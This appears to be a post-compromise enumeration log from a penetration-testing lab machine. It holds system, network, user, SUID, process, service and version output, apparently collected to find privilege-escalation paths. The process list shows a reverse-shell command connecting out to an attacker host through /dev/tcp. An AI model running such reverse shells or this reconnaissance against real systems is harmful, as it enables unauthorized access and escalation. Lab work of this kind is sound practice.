System/Kernel
uname -a ; cat /etc/*release
Linux splodge 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
CentOS Linux release 7.8.2003 (Core)
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"
CentOS Linux release 7.8.2003 (Core)
CentOS Linux release 7.8.2003 (Core)3.10.0-1127.19.1.el7.x86_64x86_64CentOS Linux 7 (Core)
Networks
bash-4.2$ /sbin/route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default gateway 0.0.0.0 UG 0 0 0 ens160
link-local 0.0.0.0 255.255.0.0 U 1003 0 0 ens160
192.168.219.0 0.0.0.0 255.255.255.0 U 0 0 0 ens160
bash-4.2$ /sbin/arp -a
/sbin/arp -a
gateway (192.168.219.254) at 00:50:56:9e:59:95 [ether] on ens160bash-4.2$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1080/nginx: worker
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 1080/nginx: worker
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:1337 0.0.0.0:* LISTEN 1080/nginx: worker
tcp 0 0 127.0.0.1:60110 127.0.0.1:5432 ESTABLISHED -
tcp 0 0 127.0.0.1:5432 127.0.0.1:60110 ESTABLISHED -
tcp 0 141 192.168.219.108:54448 192.168.45.221:1337 ESTABLISHED 13545/bash
udp 0 0 127.0.0.1:323 0.0.0.0:* -
udp 0 0 127.0.0.1:58704 127.0.0.1:58704 ESTABLISHED -
udp 0 0 192.168.219.108:38425 88.80.189.24:123 ESTABLISHED -
udp 0 0 192.168.219.108:44840 178.79.140.210:123 ESTABLISHED -
udp 0 0 192.168.219.108:52138 217.114.59.3:123 ESTABLISHED -
udp 0 0 192.168.219.108:38082 193.57.144.50:123 ESTABLISHED - tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
Users & Groups
bash-4.2$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
thesplodge:x:1000:1000::/home/thesplodge:/bin/bash
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
nginx:x:997:995:Nginx web server:/var/lib/nginx:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
total 0
0 dr-xr-xr-x. 17 root root 244 Oct 18 2020 ..
0 drwxr-xr-x. 3 thesplodge thesplodge 115 Oct 17 2020 thesplodge
0 drwxr-xr-x. 3 root root 24 Oct 17 2020 .thesplodge
bash-4.2$ cut -d: -f1 /etc/passwd | xargs -n1 id
uid=0(root) gid=0(root) groups=0(root)
uid=1(bin) gid=1(bin) groups=1(bin)
uid=2(daemon) gid=2(daemon) groups=2(daemon)
uid=3(adm) gid=4(adm) groups=4(adm)
uid=4(lp) gid=7(lp) groups=7(lp)
uid=5(sync) gid=0(root) groups=0(root)
uid=6(shutdown) gid=0(root) groups=0(root)
uid=7(halt) gid=0(root) groups=0(root)
uid=8(mail) gid=12(mail) groups=12(mail)
uid=11(operator) gid=0(root) groups=0(root)
uid=12(games) gid=100(users) groups=100(users)
uid=14(ftp) gid=50(ftp) groups=50(ftp)
uid=99(nobody) gid=99(nobody) groups=99(nobody)
uid=192(systemd-network) gid=192(systemd-network) groups=192(systemd-network)
uid=81(dbus) gid=81(dbus) groups=81(dbus)
uid=999(polkitd) gid=998(polkitd) groups=998(polkitd)
uid=74(sshd) gid=74(sshd) groups=74(sshd)
uid=89(postfix) gid=89(postfix) groups=89(postfix),12(mail)
uid=998(chrony) gid=996(chrony) groups=996(chrony)
uid=1000(thesplodge) gid=1000(thesplodge) groups=1000(thesplodge)
uid=26(postgres) gid=26(postgres) groups=26(postgres)
uid=997(nginx) gid=995(nginx) groups=995(nginx)
uid=48(apache) gid=48(apache) groups=48(apache)uid=1000(thesplodge) gid=1000(thesplodge) groups=1000(thesplodge)
SUIDs
bash-4.2$ find / -perm -04000 -ls -type f 2>/dev/null
25381873 76 -rwsr-xr-x 1 root root 73888 Aug 8 2019 /usr/bin/chage
25381874 80 -rwsr-xr-x 1 root root 78408 Aug 8 2019 /usr/bin/gpasswd
25652415 24 -rws--x--x 1 root root 23968 Apr 1 2020 /usr/bin/chfn
25652418 24 -rws--x--x 1 root root 23880 Apr 1 2020 /usr/bin/chsh
25381877 44 -rwsr-xr-x 1 root root 41936 Aug 8 2019 /usr/bin/newgrp
25652498 32 -rwsr-xr-x 1 root root 32128 Apr 1 2020 /usr/bin/su
25703692 144 ---s--x--x 1 root root 147336 Apr 1 2020 /usr/bin/sudo
25652483 44 -rwsr-xr-x 1 root root 44264 Apr 1 2020 /usr/bin/mount
25672720 32 -rwsr-xr-x 1 root root 31984 Apr 1 2020 /usr/bin/umount
25742885 60 -rwsr-xr-x 1 root root 57656 Aug 8 2019 /usr/bin/crontab
25742643 24 -rwsr-xr-x 1 root root 23576 Apr 1 2020 /usr/bin/pkexec
25385618 28 -rwsr-xr-x 1 root root 27856 Mar 31 2020 /usr/bin/passwd
25176607 32 -rwsr-xr-x 1 root root 32096 Oct 30 2018 /usr/bin/fusermount
2683 36 -rwsr-xr-x 1 root root 36272 Apr 1 2020 /usr/sbin/unix_chkpwd
2681 12 -rwsr-xr-x 1 root root 11232 Apr 1 2020 /usr/sbin/pam_timestamp_check
424979 12 -rwsr-xr-x 1 root root 11296 Mar 31 2020 /usr/sbin/usernetctl
8709195 16 -rwsr-xr-x 1 root root 15432 Apr 1 2020 /usr/lib/polkit-1/polkit-agent-helper-1
8708920 60 -rwsr-x--- 1 root dbus 57936 Jul 13 2020 /usr/libexec/dbus-1/dbus-daemon-launch-helper25742643 24 -rwsr-xr-x 1 root root 23576 Apr 1 2020 /usr/bin/pkexec8709195 16 -rwsr-xr-x 1 root root 15432 Apr 1 2020 /usr/lib/polkit-1/polkit-agent-helper-1
SGIDs
bash-4.2$ find / -type f -perm -02000 -ls 2>/dev/null
25186342 16 -r-xr-sr-x 1 root tty 15344 Jun 9 2014 /usr/bin/wall
25672726 20 -rwxr-sr-x 1 root tty 19544 Apr 1 2020 /usr/bin/write
25824105 376 ---x--s--x 1 root nobody 382216 Aug 8 2019 /usr/bin/ssh-agent
424974 12 -rwxr-sr-x 1 root root 11224 Mar 31 2020 /usr/sbin/netreport
434162 216 -rwxr-sr-x 1 root postdrop 218560 Apr 1 2020 /usr/sbin/postdrop
434169 260 -rwxr-sr-x 1 root postdrop 264128 Apr 1 2020 /usr/sbin/postqueue
17080665 12 -rwx--s--x 1 root utmp 11192 Jun 9 2014 /usr/libexec/utempter/utempter
8717664 456 ---x--s--x 1 root ssh_keys 465760 Aug 8 2019 /usr/libexec/openssh/ssh-keysignCapabilities
bash-4.2$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+epProcesses
bash-4.2$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 125364 3876 ? Ss 07:42 0:00 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root 563 0.0 0.1 39084 2072 ? Ss 07:42 0:00 /usr/lib/systemd/systemd-journald
root 582 0.0 0.0 124840 1308 ? Ss 07:42 0:00 /usr/sbin/lvmetad -f
root 587 0.0 0.1 45028 1940 ? Ss 07:42 0:00 /usr/lib/systemd/systemd-udevd
root 691 0.0 0.0 55532 848 ? S<sl 07:42 0:00 /sbin/auditd
polkitd 714 0.0 0.5 612248 10084 ? Ssl 07:42 0:00 /usr/lib/polkit-1/polkitd --no-debug
root 715 0.0 0.3 99688 6196 ? Ss 07:42 0:00 /usr/bin/VGAuthService -s
root 716 0.0 0.3 314456 7300 ? Ssl 07:42 0:08 /usr/bin/vmtoolsd
root 722 0.0 0.0 26384 1764 ? Ss 07:42 0:00 /usr/lib/systemd/systemd-logind
dbus 723 0.0 0.1 58244 2468 ? Ss 07:42 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
chrony 732 0.0 0.0 117808 1732 ? S 07:42 0:03 /usr/sbin/chronyd
root 744 0.0 0.0 126388 1580 ? Ss 07:42 0:00 /usr/sbin/crond -n
root 753 0.0 0.0 110208 856 tty1 Ss+ 07:42 0:00 /sbin/agetty --noclear tty1 linux
root 765 0.0 0.4 550204 8892 ? Ssl 07:42 0:00 /usr/sbin/NetworkManager --no-daemon
root 996 0.0 0.5 276180 9548 ? Ss 07:43 0:00 php-fpm: master process (/etc/php-fpm.conf)
root 997 0.0 0.1 226744 3340 ? Ssl 07:43 0:00 /usr/sbin/rsyslogd -n
root 998 0.0 0.9 574304 17460 ? Ssl 07:43 0:01 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root 999 0.0 0.2 112924 4344 ? Ss 07:43 0:00 /usr/sbin/sshd -D
thesplo+ 1016 0.0 0.9 397396 17472 ? Ss 07:43 0:00 /usr/pgsql-12/bin/postmaster -D /home/thesplodge/.pgdata
thesplo+ 1056 0.0 0.1 249656 2092 ? Ss 07:43 0:00 postgres: logger
thesplo+ 1063 0.0 0.2 397512 3804 ? Ss 07:43 0:00 postgres: checkpointer
thesplo+ 1064 0.0 0.1 397528 3356 ? Ss 07:43 0:00 postgres: background writer
thesplo+ 1065 0.0 0.3 397396 6248 ? Ss 07:43 0:00 postgres: walwriter
thesplo+ 1066 0.0 0.1 398080 3304 ? Ss 07:43 0:00 postgres: autovacuum launcher
thesplo+ 1067 0.0 0.1 251908 2284 ? Ss 07:43 0:00 postgres: stats collector
thesplo+ 1068 0.0 0.1 397952 2808 ? Ss 07:43 0:00 postgres: logical replication launcher
root 1075 0.0 0.1 121040 2212 ? Ss 07:43 0:00 nginx: master process /usr/sbin/nginx
nginx 1080 0.1 0.2 121504 4012 ? S 07:43 0:33 nginx: worker process
root 1234 0.0 0.1 89704 2220 ? Ss 07:43 0:00 /usr/libexec/postfix/master -w
postfix 1244 0.0 0.2 89876 4076 ? S 07:43 0:00 qmgr -l -t unix -u
nginx 12894 0.1 1.0 286296 19216 ? S 10:34 0:16 php-fpm: pool www
nginx 12895 0.1 1.0 286552 19292 ? S 10:34 0:16 php-fpm: pool www
nginx 12896 0.1 1.0 286852 19772 ? S 10:34 0:16 php-fpm: pool www
nginx 12897 0.1 1.0 286296 19260 ? S 10:34 0:16 php-fpm: pool www
nginx 12898 0.1 1.0 286552 19312 ? S 10:34 0:17 php-fpm: pool www
nginx 12899 0.1 1.0 286296 19192 ? S 10:34 0:17 php-fpm: pool www
nginx 12900 0.1 1.0 286552 19816 ? S 10:34 0:16 php-fpm: pool www
nginx 12901 0.1 0.9 285472 18380 ? S 10:34 0:16 php-fpm: pool www
nginx 12902 0.1 0.9 285468 18372 ? S 10:34 0:16 php-fpm: pool www
nginx 12903 0.1 1.0 287320 19852 ? S 10:34 0:17 php-fpm: pool www
nginx 12904 0.1 1.0 286032 18892 ? S 10:34 0:16 php-fpm: pool www
nginx 12905 0.1 1.0 286552 19516 ? S 10:34 0:16 php-fpm: pool www
nginx 12906 0.1 1.0 286296 19188 ? S 10:34 0:16 php-fpm: pool www
nginx 12907 0.1 1.0 286296 19204 ? S 10:34 0:16 php-fpm: pool www
nginx 12908 0.1 1.0 286552 19812 ? S 10:34 0:16 php-fpm: pool www
nginx 12918 0.1 1.0 286296 19196 ? S 10:38 0:12 php-fpm: pool www
nginx 12920 0.1 1.0 286552 19284 ? S 10:38 0:12 php-fpm: pool www
nginx 12922 0.1 1.0 286296 19200 ? S 10:39 0:11 php-fpm: pool www
nginx 12924 0.1 1.0 286296 19612 ? S 10:39 0:11 php-fpm: pool www
nginx 12927 0.1 1.0 286552 19292 ? S 10:40 0:10 php-fpm: pool www
nginx 12929 0.1 1.0 286552 19812 ? S 10:40 0:09 php-fpm: pool www
nginx 12932 0.1 1.0 286288 19040 ? S 10:41 0:09 php-fpm: pool www
nginx 12933 0.1 1.0 286296 19204 ? S 10:41 0:09 php-fpm: pool www
nginx 12934 0.1 1.0 286296 19576 ? S 10:41 0:09 php-fpm: pool www
nginx 12935 0.1 0.9 285472 18364 ? S 10:41 0:09 php-fpm: pool www
nginx 12936 0.1 1.0 286552 19296 ? S 10:41 0:08 php-fpm: pool www
nginx 12937 0.1 0.9 285472 18448 ? S 10:41 0:09 php-fpm: pool www
nginx 12938 0.1 1.0 286296 19192 ? S 10:41 0:09 php-fpm: pool www
nginx 12939 0.1 1.0 286552 19292 ? S 10:41 0:09 php-fpm: pool www
nginx 12940 0.1 0.9 285472 18452 ? S 10:41 0:09 php-fpm: pool www
nginx 12941 0.1 1.0 286552 19292 ? S 10:41 0:09 php-fpm: pool www
nginx 12964 0.0 1.0 286296 19192 ? S 10:46 0:02 php-fpm: pool www
nginx 12965 0.0 1.0 287112 20008 ? S 10:46 0:02 php-fpm: pool www
nginx 13204 0.0 1.0 286296 19196 ? S 11:06 0:01 php-fpm: pool www
nginx 13207 0.0 1.0 287632 20408 ? S 11:07 0:00 php-fpm: pool www
postfix 13528 0.0 0.2 89808 4052 ? S 12:45 0:00 pickup -l -t unix -u
thesplo+ 13543 0.0 0.3 398476 6408 ? Ss 12:49 0:00 postgres: postgres splodge 127.0.0.1(60110) idle
nginx 13544 0.0 0.0 11688 1140 ? S 12:49 0:00 sh -c /bin/bash -i >& /dev/tcp/192.168.45.221/1337 0>&1
nginx 13545 0.0 0.0 11824 1824 ? S 12:49 0:00 /bin/bash -i
nginx 13711 0.0 0.0 51756 1728 ? R 12:59 0:00 ps -auxwwwpolkitd 714 0.0 0.5 612248 10084 ? Ssl 07:42 0:00 /usr/lib/polkit-1/polkitd --no-debugroot 744 0.0 0.0 126388 1580 ? Ss 07:42 0:00 /usr/sbin/crond -nthesplo+ 1016 0.0 0.9 397396 17472 ? Ss 07:43 0:00 /usr/pgsql-12/bin/postmaster -D /home/thesplodge/.pgdataroot 1234 0.0 0.1 89704 2220 ? Ss 07:43 0:00 /usr/libexec/postfix/master -wpostfix 1244 0.0 0.2 89876 4076 ? S 07:43 0:00 qmgr -l -t unix -u
Cron & Systemd
bash-4.2$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for nginx
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
NEXT LEFT LAST PASSED UNIT ACTIVATES
Tue 2025-03-04 07:57:42 EST 18h left Mon 2025-03-03 07:57:42 EST 5h 3min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
1 timers listed.
Pass --all to see loaded but inactive timers, too.Services
bash-4.2$ systemctl list-units --state=running
systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
auditd.service loaded active running Security Auditing Service
chronyd.service loaded active running NTP client/server
crond.service loaded active running Command Scheduler
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
lvm2-lvmetad.service loaded active running LVM2 metadata daemon
NetworkManager.service loaded active running Network Manager
nginx.service loaded active running The nginx HTTP and reverse proxy server
php-fpm.service loaded active running The PHP FastCGI Process Manager
polkit.service loaded active running Authorization Manager
postfix.service loaded active running Postfix Mail Transport Agent
postgresql-12.service loaded active running PostgreSQL 12 database server
rsyslog.service loaded active running System Logging Service
sshd.service loaded active running OpenSSH server daemon
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-udevd.service loaded active running udev Kernel Device Manager
tuned.service loaded active running Dynamic System Tuning Daemon
vgauthd.service loaded active running VGAuth Service for open-vm-tools
vmtoolsd.service loaded active running Service for virtual machines hosted on VMware
dbus.socket loaded active running D-Bus System Message Bus Socket
lvm2-lvmetad.socket loaded active running LVM2 metadata daemon socket
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
26 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.nginx.service loaded active running The nginx HTTP and reverse proxy server
php-fpm.service loaded active running The PHP FastCGI Process Manager
polkit.service loaded active running Authorization Manager
postfix.service loaded active running Postfix Mail Transport Agent
postgresql-12.service loaded active running PostgreSQL 12 database server
Sudo Version
bash-4.2$ sudo --version
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23Sudo version 1.8.23
Glibc Version
bash-4.2$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (GNU libc) 2.17